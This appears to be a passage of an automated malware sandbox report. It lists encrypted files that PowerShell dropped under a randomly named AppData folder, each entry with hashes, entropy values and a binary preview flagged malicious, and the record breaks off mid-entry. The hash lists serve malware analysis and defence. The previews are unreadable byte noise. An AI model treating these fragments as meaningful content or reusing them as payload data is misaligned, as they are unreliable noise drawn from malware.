                                                                                            MD5:622E5BF93E7C343A7E3919887EC5F9FC
                                                                                            SHA1:E1DF4AED97229B5704407A07C700DE9DBD32B685
                                                                                            SHA-256:25D21EDCF36B1BEED4FB118A33AC91600C52888254A86A9399D4E5A342DDB87E
                                                                                            SHA-512:F400CACABAA95D1DC1A016B73DBA464749293E811EE1CDC1D6957BEFFFDD93E2FB491C7A6BB9AC069E03247700314277E9C2667EF18BA8DD564C24B5A6F60CDE
                                                                                            Malicious:true
                                                                                            Preview: ..IN;.K.F..pV.. .....~.A...j.....G........*=>.....^....s./..yHZd..^..2........*/..Y.}...k.27...M.....+.......N+._J............... ..5p..t.p..<..(.g[.B." ..e...2.B-+-*..<....\..e..s..Ql.....eh=.......F..)....b.2...Mq.2..0..%}.....n....d.c...}....9..ZO>{.%.<O.......K.u....-%b.k...'^...).'Ia^Q...;.A.....N..|.v..}M. !..P.P29.u..0.I.|e.c..)..V..U.3W4..>.Yxn.lrM...,(...B.E..>*.G..Afx.Z..".].h..B...-.....Wd1.N.A.^..V.G!K.)#gl....u...Y%.............L.).....zgL..;......Dz...R.-..L...2..m.?_..S.F..=..."@.g..K.9...p..z.1...:A..A...B\..H...?!....8..G.7.E.......?..U..(.j..r...5.".^..B.Q....(.q...W.N...O....k..~.z...k.../..%..&=d=.....i.2)..cwgo"RQs...~.......j..?..0Kkq..R....g.......).v...r:.7.l......Y,....DW.J........A..p.v....,....D......,>.!~.k.e..Lu4e..ua*E..*...Z.."..Cf.|'w;c.....5...U..x..z(.....1.f3N.....Jh.!%.tx..[.........3...i.[k......4.p.s<....1O.I/...UWN.yx.9.VAP...I4..,^.....Q.....7.T......R.A...K.6...[.......P.y4..S..._zFS.
                                                                                            C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\RNcZQGstayolJSYCBxE.VhPGSvfcFzHuXrnW
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):86904
                                                                                            Entropy (8bit):7.997372640023325
                                                                                            Encrypted:true
                                                                                            SSDEEP:1536:9TkG16jOeTi2qsAyKhoTuuUQQ3ik9re29i70PU9BT1WnyhVTLsPD1/pDFvX30V34:9ozqs6oTuuUQhk9xc70c9B1ZIFfX3Ued
                                                                                            MD5:234B359A5B629FFF7C4FF9A6A0A8DA5B
                                                                                            SHA1:01E37879DC07520D9E4EE7EBB6F3B3E8CD62AE8C
                                                                                            SHA-256:7B8C6054ADBB632859352493EB4E909F2AF37631684A05121118EB89AF42E91F
                                                                                            SHA-512:6C5B8609B6A510D24BAC8B11BDBFA412EF3642ADC71027CA39A7971D3861F0FD865F88F505EFAFB5EADAFCFEA767815F9C7E226F43AFB16F50DEDA0EBF6899D9
                                                                                            Malicious:true
                                                                                            Preview: .iM.l.3... [.g...U...|{.sF.x."....r......T..Y..eH.....v&"..c..b....<6..:..].1/.Y..Y...~J...5...!.oy...K..*.9....."...4.{.>....5.......f}.B..E.T.]%.w...;...H..6..0.;.Dc..6..{..k...0."|4...._..{..M....x.j]J...)"........n??7.$n..A....o...l...z....G.8F.]A<F....'b.8..b<. .k.}...sF....hj....N....m.1.@......)T4...C.GJ4....\........y{.o...MZ|.Lv.N<.P8,:Q4./.....T/0\..jLrZ..^..C....\..MAzn.....7J(_.....o..1....R6:K..b...1...k-r.gm&.................9.t|..Js...>...LR..t.h.i.....|.o.<q...z....E..3E...q.j.+NB.h.bY..;G.u.M...a..B.U.6.|..^..D...D04A..k#._....4...@...#*\Fu|...>....uE.....V.2.)1.Ey.O....Bv._.VQ.....E.)..L...R.1..g...kav..h....I.&f..qkv.6D-....V_[. .-{e....k.......5.HS_...w....F/;D...e.b..a..aAB.j..=..s.Y..N....-...{.Yq9.!.F.>..C..v........|q7..9.....[.w.v.9...@.:.j...e.q.............h&[..G..0J.u..@.:6....m....I....Dy,.....[.. .5h....0}:.(..Ki.fxV?....%I..1~.....{...7....|~T..9v._...@...W...../P.g.......@...5.){.;b...^.YH..&..
                                                                                            C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\SMUFCxligOrHNwktv.gnvGhdpoQZiTuaYkCHV
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):74687
                                                                                            Entropy (8bit):7.997583115152667
                                                                                            Encrypted:true
                                                                                            SSDEEP:1536:4jEetKqrTzNhICp9zbcS4IFEv4TwhyGWpZtDh7wjLhs5mKGS8cYL:4jfjrzTpFbcSdFEvPPI1h41KkcYL
                                                                                            MD5:C4C3D5D25EA7F2A6004519229120FF24
                                                                                            SHA1:519350B420668E331741523D3AE7B77CC9179AE5
                                                                                            SHA-256:92FBED28641435F6BEA9549DF377E0FBF3277D062EFACF69BA0B4CBCCC33F800
                                                                                            SHA-512:F2CB58ECCF9633EF4C590FDF9EDDC721BD03071577346CDAD65B718C67507307EF28B8DF0DB7E046C6A70117FE52A8427733DCDCB1D0621F36BA270D6C0F66E9
                                                                                            Malicious:true
                                                                                            Preview: .<.E\X4blkh$...lf..?...Y.......5..w....f.}....1.w.V...-Q.WN..b.z2J...P...C.'.U2{..D.]. I.F(....mIbN;.K&.....;).../ .C...C....r.(..a...Ha..&..i5'...@*i...a<...7.r.K..#W.x.. f.5.....Zt.F;v.E.M}..V..,b4..qylY.+.He.Qq.].....3*..R..Mi!.....g.yJu.(/+...F.yzS@.F....L......jt.t.o.U6.sw.\.@..]S..%...f.+3....k6....^DaQV.g.W.TC.......5.@..=`.m;..h,^.K.......H<?.._.8&.(m!flB..... .t.O..V..a.... .gcyk...#...N'...>...%.....DX..iT*...O.+.o..i:..po]9..S.g:."e.7....zf.s.Y....M..-..z..t..FIl..F7..g.*.....9...]]8.NK>]^.w.q...`~....A.A5...:8..].%...&...C._....#?.5....`#k_......T6..bOE.8.b.:.9..Y......sS./......~.*..9&.lZ.S$..(|...h../..3..^.e..z..Ns..k% ."T.]G'..P.....cI.F[.ru".-7....p....n...>.).....F..%.Z..2?/.....3.....G.y...K...D...K?t.c<..!..l.p.PN...[.b#h.c........:.......";u......5..YLXI?Y....h=..E.v...Jb'cW.2G.n..,.e...*6.".7..?..;}#..0..Z......W...pX.4@T+k#.@..|..4....,.<..?.*...$e..|7......z~SS7.B.9....w..kb....CZX.@..j..<.z.....u+.....S..F.4.b;..'
                                                                                            C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\SpoqdPasHmF.qLfZsOXHPMDmUA
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):135055
                                                                                            Entropy (8bit):7.998477015445849
                                                                                            Encrypted:true
                                                                                            SSDEEP:3072:hQCfChvQacwrPSun7C/2Q39FB9x7Qcmv2mJgeAxH2:h5aYqSue/VDqOjxH2
                                                                                            MD5:1F4F929B1B4F690C4F15F45E5327AD03
                                                                                            SHA1:4DE1880B092BF141C43CB20677499F63907D3178
                                                                                            SHA-256:71B1C2B4282CD08032FFB0863E89D763C4EDB17B2EF2F8203D961985C95C86E7
                                                                                            SHA-512:58C34829C53C0058B354B378E10701B0C04AD3D95F21866F10144A06C8F58F1A975548D9B00E9DB9B42DB60848910328B910F506B5E70482A7DFF9B9A43705FA
                                                                                            Malicious:true
                                                                                            Preview: .r.N.|Q.A@........ U.%............. I.l..`G.FE}AeL(..Lu..x....:I~..2..|..+j...fY#c......G.+\2Yb.........z8I2...M...B~_,.H.Q....]h.e.JM..4..S.k.G....pSI....ZF.}..r7~..E.....4.G........+U.......l.....DP....Om\.~.\......!l..#..A..s'$.5.}..bI.0xS'....2..#......P..V.{@M.w..<c..G a*.xVk.Q...A.;..b.b.?....+.....%...Y.).w"6.r....6...p.+x,...V.7..y...2..+.MBg...<.O........{..j2<.....[y.....4.Pk..j..'&..(.*.k..r.sK..C-.....{..Y.`!.k.5..N.Y.y..%....&..;V.....q..hP...w~.,.+.....c...X..o......~q8.V.....+.......=.H..42da?...Dk`..I.1....P>.B.V..)..".F.....o`NI7.w..-..t..#...@:.7..wb..lE.U0$..C...p....I."..0TU.)cc.`[.L.6.Dy#4n.a.;-.....E~..O..J......%i.q.g6x.Q.6W.G....j*\..~....(..`J../...N..V.Tn...p.r...G.v....p.........,.Q.*..+...ta...VV...d....r......w.....Z....4V.z0>!.S.n..l @[.....n....no......U[.."..#i. ....2.U.(Q.ut..Wg.......=...~J3...lp.......x.(...X...=...".F......-s.z...5...4.E&.L.j..xp....I..Z.[6.)l...^i......x]{cYU.U.....`.h.5..
                                                                                            C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\UAnjRPwBSVcJvoyZOh.FOqQEDdkfmpu
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:DOS executable (COM)
                                                                                            Category:dropped
                                                                                            Size (bytes):174780
                                                                                            Entropy (8bit):7.998904439002782
                                                                                            Encrypted:true
                                                                                            SSDEEP:3072:vZqOPKgXjZDLi6OQudVzM2isEufqcqsHsFpDKF1eTmt2E5mxZuyyvL:vZq0XjZPOQudBM2i7VsMbbmt2EaRk
                                                                                            MD5:A5B6CEDE0269755AB5AA016837149129
                                                                                            SHA1:E123156C608FDB43DE9F327262A331975FAED56E
                                                                                            SHA-256:C9D8922611393E47736D23F019C7B1BBDEE95BEBBB75E12AD679E955535DEC95
                                                                                            SHA-512:117FCBC47162BAAC61B11FEA0F72ED4BB155A7EF51F2721C5C054C240EA3B61CAE0B3400B37BCC247E22DA4FBD32B0068DE456B678F1F2DF6CC8E6529DF45D83
                                                                                            Malicious:true
                                                                                            Preview: .0..J....)...c3$......<.`9H..:..>x.s...".;.........+Q.R...q....9....ek...U...@8?.K.0&.~......R .m8.$.8....D..d..zvLRdUA.\.'8..]....C...:l.9.m<!;1L....&S{..$....d_...`....j....A. ....6.7o|..RC.?....s..^.66.u.*.f..3G.w...d.'chJ!+...a....l...h...u...<.......B*..;..{|..v.(......\....S*Y.7..I..i...4.......'.z3t..U.....!rP ...&.}.......2?.2W..}zby..o........4ec..._..muV.C>...w..|.,...mm.L%xR.9.8.&..I."3.Ph#..r.O..7..d.1i P.9.!..Q.2.....J.D.m.Q.. ..,....V..c..4 "...-Bd....p.......R.7~...G...Kg.ih.k*@.$.5.O..w^1.g.3b...K....$0..!.ezF....U.../.....r..K.$.A*....Uz.*.K...,iW.....AZ.......!8d..6t.z.C....J..B.jU.R".......f).X.U3.TK./J.....'..B..Wq.G....`..d........5...x...K].Fe...H.H.h.o)..C..A.k.!}D][...E.<...M...a..|.v...m......C..%...tl.+.K..K6.7...J.. .;qK.Z..X.ZH........!.YF..l7J.x{i~8..Zp.B.....7..Fc..>.+...n.......r.. NV.&5.i.=..j?U....e.>..!:...`.W........U..4.1BzM...\.IH...CfV.K!..L..z-t=...rRv..f!.;J...8...a...!.S.+(./n.o...{......wm2..]|...#
                                                                                            C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\VDWdfjnwIM.QtgAySoCKculLD
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):64364
                                                                                            Entropy (8bit):7.9973990079335655
                                                                                            Encrypted:true
                                                                                            SSDEEP:1536:0DiVVorvhxbZTpOnWR1sSVq/3MMDzAYbt4:0oorJpB1sSg3X3Zbt4
                                                                                            MD5:829D85342B2C71236FF31D02B443C3F9
                                                                                            SHA1:C78541609B9B2AF8DE8EC0034F3F80B3D56BABA4
                                                                                            SHA-256:E02F1CEE8A0DB601A16E9B837ACBEC5C05597A21ABFE6C5287F423926ADE6C1D
                                                                                            SHA-512:F0A7A3107FB915687A9CF0C52806EC391B9611B25E41F2B3FAFFE1F3F380970BC50972B4143B23EAE2EDCC13BAAEF08A5150C471CE6BA4014A9CB3904F962DD1
                                                                                            Malicious:true
                                                                                            Preview: ...al.}H#.....`..z$*..J.._....!..9>.3H......T.k4...5.H...._.&.<.....F.DC&..mx...0?=F.i....V....]\..J..DH.3.A.Sju......#.H.*.9.....@6N.*...5.B.M....I^.|.....V..}.1..)?.J^..........M...p-.oL.?.p..D.....:..W.......U.#~.|..e..cB.6..^9=....ZxO..R.2L... ..' .....\.-.....v.x$.,.7......;.cR...=..f..!jL._5x.R.m..5..=...p[..K..A9...S9.....?....\...z.......;7.....l...Q...r....=..4.........?.E.W|.~>....S....*.&.uz..i...aU..2.g3Q.:@.......|...^.M....M8T&!..........4...g........3...n0...UV.P.j....Y...._./o..#...B..e^.,.:=..T.G..v.()......\.2...Z..,....nZ.'.T...ay.9V......X.......V.5)..&l..:...d <.;..:..}P.:.A.^.,O.Y....,r.V4)a.......6ObPY......8.9P.#....F&../..i...1...f\.Z.y.9.w.S.....<4..2.......Y..8.y.Zs....F.9Db..1..(..[.O...5..*s...S....yIE..U.. &.......!c.K-........q.`.(...I.r......@I..........#{..k..@.}.p.f..M.._..X..H.7.58;ZN,..........]<....!ip...#.e_.D[.l:-7.dP...Q..X]..K8.c..m.=...x...L.T.f.X/.R7;..3.....!..}}...1......+..,c3..5.0....
                                                                                            C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\VTeCclXuGgiqHBty.gVkwyjzbJWDF
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):106734
                                                                                            Entropy (8bit):7.99823102431348
                                                                                            Encrypted:true
                                                                                            SSDEEP:1536:HXrENP1ZbAG9mq7Z/6BvS6USYW9o/wfL4Vd4swlGaG7+pDg3qfbM7i:7ENPsD0SQq9o4Dud4J54+F
                                                                                            MD5:7893824A7CBACE5A3EA53DF93F03CE7D
                                                                                            SHA1:F9CBA63D3911617ACCC3704EE809B6677D8E74C1
                                                                                            SHA-256:E6BFFE8A8DF50CF57B6BDF5612921F64F9D6A9D447F6FA1393789C757AED49D5
                                                                                            SHA-512:B92A7466AB829453AA53986D2CDED8593A565E2CCD170E297773149CD21154A1BA9BCAE55CE1C219725784939725A8B896A46C0B6FA0FBBC574639B622785F0E
                                                                                            Malicious:true
                                                                                            Preview: ..6.e...;...=r.o_.6L...].2o..m....3_....f......e#.6..V{. ..^.'9.!9...G.DQ{..pR....b7.<;,.>t3.\?qg..1H..X+XS...P.?.c._..o.2....<{...a.....`..#HS.......uB.S.^.....Mg3..S>...SA..^,`.k....m........S..'.B...!...H2>2.V%q9GFI...Nx.t[.r.9..).*..l...W.W?u-..L..#6c/..|0....-:G.}..H2. K.-..LX.....W3.1...}9.H.A....p....K.N$.M...'..\J.j.GsM.:..}P.M+.-H.R..p.. l....|...K'...ZT.\...S.b..G[.}8#.....C.... Z|.D..t..%.l."f.C7...i@FO6....b.q..*...a.k-p8....:.a..1.;..a.[.......;9@s,.;.....;xb.'\...3.b..R..\...?.dO..kxD.. .......L.1...1!"...A.w#....a.....j....U....8|.H.7...).....Jfg...5....Cz.7...;...;...@.sQ....u....../d.B.vt....U.......S.Mt..o..&..(8cA9..f..#@.\.i*...h...........c.p.Z. r(..*3.l.........*.6.^....\.?b5.j....Y.zk.q...YM.T..-......,9...Z...=S\x.rI..eD..a.~...S..M2...C.FO..Z-. ..8.q.9......,....*..XzT........^Ic.R......XD..H.-..._.:....h....|.;......!...Z{.}.u.Q)..i%|J..[DD6.`...sR).....<..}.z0.Vz..&........#..'vn..8?]..x..)/.t|......?....j..
                                                                                            C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\VaRltDUbPMkAJw.kSNCiwQBaoM
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:DOS executable (COM)
                                                                                            Category:dropped
                                                                                            Size (bytes):135856
                                                                                            Entropy (8bit):7.99866082753375
                                                                                            Encrypted:true
                                                                                            SSDEEP:3072:tl1cpnHAHpUwBuR66iqbYuzUq4SXXtmctnweq0DZZc8rUOpvj:0wSiHfq4KtmCno0DZGiUOpvj
                                                                                            MD5:B9AB5EE9C1F27FCA73A29920001ECDF3
                                                                                            SHA1:93A4E96B3A2AF543384D776A8ABB7F7878C32D7D
                                                                                            SHA-256:A04C3DE6A9416A40FE3C8DD143D8C9B5DED93915813426A16A56632E2E4A2BC9
                                                                                            SHA-512:00C6BEF2E258C2C30C842E86DD8D3C9E31C1D4F82D2A5DD55EA2DB43C7E9E55F97D02FDDFBB47F54F02BA1B8D729BE2E4914A98CB66682E1E59BFF817B20050D
                                                                                            Malicious:true
                                                                                            Preview: .r@.gn!...-F...\.E?_P|..,...)b.....p....nB:C.....s...)4whj.d#..G.J.5.}..9.O.#..[....18y<.2Wx..o.i.a..>53...M.`Dg..3..f.#y&V..l....gw...I{{+W...u....~..4...j..J.....:.W..Wr.5........C....K..6*.miM+q..4.0..t.....N.I;x..ZIsU..j.[s+.Xe...T.eOJ0....}......5....dgZ{.....f#f...B..=KG.lzD.~............6.{...P....DOg...6.7.D.]Pk. .k.|(.....H.=..<..N......;.+..Y.v.dO.:...9q...~.!...4t..K..>. ....?j.rq.[.k.SE....T..B..g.D.}_.....>j4PM..d.g....;.^\=Y.,..-..p..6.2~..q....[)m.FB..dy/..... `.....,~O...U.`....S...G...l.&..U+.Hm...........A...14)u....)o15..Bm..]...8..*%.._H......;..(....(..*...6O.=>...s"L..<.hJ..IJ..x..2.q.d.^..f..dU!Y..W..] PU_.eA...5..G.8.Qx.U.f.'.a.!./.u!/.N.2..}.....G.........t..s....&........z8..o.(...&i.5.....x(....4.h."K...."lqt]...T...aS..........S@.D..K..'.....:x......TI.L..K.. ....7b..9.I5.E...D.Lr:hg.....5...q..Z|.....Ji.....W..`kJc...G@..6...xtm...2.r..{.3..9......(K...m.....9t.....o.p...&.n..XVy..[`..`.|..WQ..."..J..;
                                                                                            C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\WGTRFqeaJP.ibaGvCehnSkqQI
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):86708
                                                                                            Entropy (8bit):7.997957423000446
                                                                                            Encrypted:true
                                                                                            SSDEEP:1536:EwniOs8UZwq1oczLYBoKt+m0bSl7K++FJSFqdAVd+/7Mgj41f95x6ySdam3:EwnFJUxvz0uKj2un+HAFF5UyGH
                                                                                            MD5:7DDE22EC9B4DE4B5C75CDF60DAC5F635
                                                                                            SHA1:A9F0659209CC811D1744B9CDCEDEE40E1920D800
                                                                                            SHA-256:C39704CE4DEF2C306FF80F373E255E8056B9137CB34ED75CF29D84D4AE083430
                                                                                            SHA-512:72E2A3224240E0BAFC4B42921C56ED2E27C9119D15B9458B4499575A2FA67F8D8F62EE4700B7E2B46A21FF1C49C9F4412EF312AFC06195C52DED8980344B4B78
                                                                                            Malicious:true
                                                                                            Preview: 4..]......:k..>3...Db-..k.x...P....a*...q..#r..SW.Q.....\H..}........_........$..~...4%...u(...:.F.4......7$~P..Y..u1.......BuC...*k..RP............j..Bos9.._....f.&..i...W....Fq.c...........-<k}...k.>f(......@q3.9..iI@>........>.]...$?X.b.*H.v)x..vawQj,^ .(....tN..,....].W.f.<.....+.1.m../.cS..D.SK.....i....wR..~..#.RL.).....G..W#'.@....tn..w.=!......>...eM...V.V.3.....A...U&..^.HJ6..3.!E...~h...)f.>.R.....'..2F...>ww_...7\..o.a........-...a..ip............0...S9...;h.I..n.`.@..FN..K.:.a..^....l..h|gS89D.e.....4ZH...W4K.j..........}..*....f .bU.....G.c..5.s.]..c.\.'._=..z.xm. ..t:.s...b.4G....h.d..U.#.4Z.iG..Up.3...K.xE...t...i....OL9....D.mC:..\....P.1.q...h.8......Um3/0..}<.......q.]b".<.a4..2.+..<^...?.h..[...r/s.Jk.F0V....KH...x...z.d..T..<.....&.-...'..b.{W....,....xKL.H.........k..n....L.n......h..q..{(0.+..u6.x.6.{aq...)L.....x[...h...XG..}..3S!.XhW.\/..^(DX....wNF......0...........ZD.^0...b....F...#.+`...x...g...b.V..XPk...
                                                                                            C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\XfhvNpPxsGnYwEj.KsfSpNicARGJODo
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):165553
                                                                                            Entropy (8bit):7.998912086610298
                                                                                            Encrypted:true
                                                                                            SSDEEP:3072:ZwgEEJi8rYHDanRjXQvcoJwPLzBn2PIz98e/fxiof7Cf2Bil7j+Biawh739OcrGt:eg5qHMjYJwR2lcfxze2Ql7j+BiawR0
                                                                                            MD5:CF34269A90CDF0D1BBAB5B55DFC5F6B5
                                                                                            SHA1:5A26D70FBEA9D72D186DA3BAF14A605EDC2EC800
                                                                                            SHA-256:49B91F2AB2502A2E3AB8808DE145ECE67569043504706D32250B12156EC45FDC
                                                                                            SHA-512:EAE8AC5A45175324E8AB2E3CAB962DD6E133BECE24AAF36E309823C32AAEFE3EAA5AA72ADCCBADBC79AA86BD35E7E50D4682642B6B96CBACB6E5CA95D9CB02FC
                                                                                            Malicious:true
                                                                                            Preview: ...B.Xg.|.....7...\..<.N..1tD...t.O..>.qA+...dV..)e...q:...&.s..WKHngAP.....Z....\d/.X7...rj~.;.D..J....}.`Z^.3K0...h....DX.b......|.x..U..K}<.p?.N...4Q.Wyb..]#.L...X.b.gj.......C..%...p..Q..o}(......T...:FC..K..dS.7F........ ..,O|:.sK.D)W..q.#.....A..C...."?.l..QR..[..e.{.+......s^z.r.4...U.....$.;.<...$.6L.Z..<.kM.0..|.....u=...".x...[..5A...._..C.st..u.c.......&..s.@.#.;..\.w .a\..6.....&..o.....F.P.....I..@."C....H.A.......Iw3.u].5B.+j..7..A.......d.n.8..~..v.%..m.V]..}.e....j..v..NhV........z....>Z.!.f....H.L.,..w..L......N.y.tes.)._]...\M..p.|.;.c/eXc/z.sv..Q..~..!_...%...0nXiu.......r.^.nv.7b`.k...9@..WJD..yT..B......oq.J...k.Z..x...2.(.Cw.!......'..'.L.{6...d.0.5.v..!+..(...g.<3J.Q...L ...i.N]oq.K......$..../......:^)......k..?...)j'U.2.6{.d..|~.6."..4c>.............:.3....6........U..P..*...././..X/F....v.....0..S..._A..4A..n.....uv...y.]....]i|..._....^x...u....;,E!p0..Q.......u:.pl..Z.?V.i....Av.x1..f.1A..v:.&}..K.k...p..$[.
                                                                                            C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\XjDcKESNRldofOIr.IBHmlCxheODv
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):96431
                                                                                            Entropy (8bit):7.997956940540266
                                                                                            Encrypted:true
                                                                                            SSDEEP:1536:9KnopMJfuEeGCPj5SUXxJIcQehW1ZW2qacJzk9FVDkcg8P//46wjrg+xp6vdg:4BLeGoUUJIcQe0ZW25chkRkcx3/41XgI
                                                                                            MD5:D0A395054D52A0D67B586DA1A09D06E4
                                                                                            SHA1:67A3F02999C0C094EDDE72803493BF92720F9462
                                                                                            SHA-256:16D58D03B29C04921CA03F40E0EB17C58B1DA87F4C486B593410103A3F3D8883
                                                                                            SHA-512:19FED4C3A2B02D2F04E4ADF64985DF7C1C956953B4E544775ABDFF03DA10750088F048D3B2607400AA3D52E5D2D1391E9B1CAFE34E6E7048223C655C6C3E0B70
                                                                                            Malicious:true
                                                                                            Preview: 6p.DQ.F..0.J..R.[.A^...4.....BZ...kc8.... ..V.4...0..\q4.E.Co..t.#..#..Y@y.um.n.+.~*..'./.w#..2.3.2.M..w...:.8.DR.I-.........G.A.w.9E.....DipU...i.a..afZ+..?..}."s........=...(f.X.....R..0....wcj;.S..2.W.x8..5.$.Iy.!Q2..V....3k.*.."....5...hs..q..I.f..rA);....W....9.....+..|.N.5.u@.vd...K...o.h...8K...Qb..:......{.i.,.Ngw.\..8..N..rA.r..._$..y..;.x...`f.....K...F.X:...lP.B...u.....e.fI.r......3.F.o....q#....;.......L.K..\..../.,......]R,x.c...~\.-#i.U...2..]....`...du...w..-1?5.....^g+N*........*}s....`....7z8.<>c.J..{...'/g.....)...?..yZ..Pe..N6.l....<.c1m+y5....Fn$!.1g~.U1.`.Vn..]n!.y.....0..C..v.OSx;.U....,t?..Z.k..%9..%i.N.v\.......c..}Xx....x.....*.}'....^...1..........h.&.r....*..x.G.....Wa.=...9..Y...?....L.."C.....`..Pv....b.0.mF.J...........dR@....[.Q..&.;.".:...pS~.[..>..v...n@...>. #&.....xV.....nH.d.D.d.5d.R..2l^.l{&.[.l..6..~x.s...3.~{.~.>ZXm8.,[.!.Hx.F.."L.@...*...\`....@.EQ..RGR...oM.k.Y..f.MzGl..ekhR..de..d"W.D.v
                                                                                            C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\YNTcqzPgVesCmlJHUdr.DOsNBcQkFwW
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):194306
                                                                                            Entropy (8bit):7.999116472827157
                                                                                            Encrypted:true
                                                                                            SSDEEP:3072:FNTHAEKxW9cKGCRBIM87ytuBwd5SBs6mXDJp8PWasz9g0IICV8hNLaMvRj:FNkfW9TjI1Otucm8DJp8PJs/3o8hNLjl
                                                                                            MD5:BD77872716E6765366B4E151306FB97D
                                                                                            SHA1:E18AC5B1188F14B9CFE2E452B3283F34CB23B5D5
                                                                                            SHA-256:26D2A98A2E8A720C00D2A4C7FD375B450C92A8CA730266A42C62EBC34C96CB67
                                                                                            SHA-512:D6F0CA11A7BB9B20A2044E0AC0A6689C7B9088AFFEC5579B8E2CC384007DB03891D77F87BA0E2E80FD0B33A16A7AAF4ED543F15117A69F01FA6F71A3CB765A00
                                                                                            Malicious:true
                                                                                            Preview: ..2..S.....y..E.fF(B....o&y...@..y...l..gY.......7Q.....,..k....2.l.^.....;^.2F...ra!.S...........{.J.h~..A8..8......[........kv...L.W.I........'..(...3..a....D./......k.k../....B_>.X.Q..A.<.%..A..R.u.n..p.2(...ZB...z..F.O...M..>=i.....Tw..I.9|..,W[....I.D4}.....t.............. 0..e~...\..:bLt.n.GpG'...M@..n..p3._qky.(..V.P......li.d.8..?h.../5....TG.w.'S.......QA?.xGk..j..o.z.x...=....../.h.E..I...0.O.H..".Ae6...|..<....F`.1p.....D<...l...~.@&...M...FB..@..l%...F...??P... ..x>%Gx..E.+..vX.._.....D....~..ym........Pw.t.\+...../j....4,I%.n....)...%1.0........N.B...NU..Qa.U.............GD!.g0i^*..-o*C..e...1...l.rTk....?n.o.r.M..9..~^...]f....h.XWuTj5..w..M....k......0>...,......n.i\i..Z.....U."l.b.E.....J..D...r.N}...)..........)..(.....I.!.~...S..e...Vs..s..I....4q..f3.D,.BQ.y?>.h.;..*...x..5....{....m.W*j......P.k.G.U..q..KS..\&.i.j.^....~@.v.Y.0.<A;...3xUJ..t......N..A.<wa.,......-.Q.*F....s..W.&..u.9v...Ld.~......2#@.yX..
                                                                                            C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\alkiEOVhjq.QklCoYcFqu
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):108044
                                                                                            Entropy (8bit):7.998245796083788
                                                                                            Encrypted:true
                                                                                            SSDEEP:3072:5HcxWf4SghzXl0oUMNPCY4MlUmhxynl0zw:5X7ghzXlboMlUmKl4w
                                                                                            MD5:CF8791CF2AA8F62CE26141B68C3E3BDD
                                                                                            SHA1:160089F07AD439836621ABCD85AF0630DDE78427
                                                                                            SHA-256:5453A2D29D92D4AA1BFBA813F9FD71B6A060BAC818E1963432820D03552BC53B
                                                                                            SHA-512:A9FBF181CAD855F54ABC24D4AEC56D16619917BA50C6457DC32D82D7B6E0098E52226109C83DD4956A503733DE09D6F262597D80718DC6A6945DE3451E5AA4BA
                                                                                            Malicious:true
                                                                                            Preview: o..$.............L=;...2....A{?2..`at..X..HrPp.]......C..?.w@..[X8"|7.9.\..5..a..#..K...18.2....w.q3.....$......l.}:......)..(0}0.$.u.a.q...tM..].@....h.....*..?.R..C..Z...C.....e.X.i~.H].x.O54.h....M....?..>..tib...ti{V.Q..]....Xs......T.:....0..."&v...E$..vP[.C...3._'B{.......f2....K..{....p..}.[.j.O.x.f_"...I...P..@...I}..n....[s.l..A..O.n.*..`.........7.:.Zx..>...Ut./\5.u+R...G.~.@[D...e...jd"..g#....l..._..f.!.z....P.oAe..fH.R.. .x]....@......C.S~*N..[.}.Q.3x..{.|....Nm_b9.w...%.0.3....B..k....sAv..C...A."...5....H+.=.._...=....HXs.R...4<|....O.*..d.u.{.H......8.....?.}.'....M.r.s.s.r9.)..+..4...O...a. ..(..*w..N..q.9W.{.5.............R....i.c.P.......:Z.K#.....Cz...p.. yF..G.s.M.@^..pwn}9/.....A..=4A.a..GXGMy..]...=.3.....yc.%...J..a.GJ).'0........V...N.qE9.3.G."KD.E..G.~...ph........cV.....k.-].t..~..."/.....#3F.E.I|...6o......5.?..5...a.%...8.-.#*....7.....;X,.)T}..~..p...J7..~..\.....&T..)...N.....V.L$..ayS.M'..|..%^~7....:...v^..q
                                                                                            C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\bDZLNaQSRephwkgE.bzmDpAKEtnYiw
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
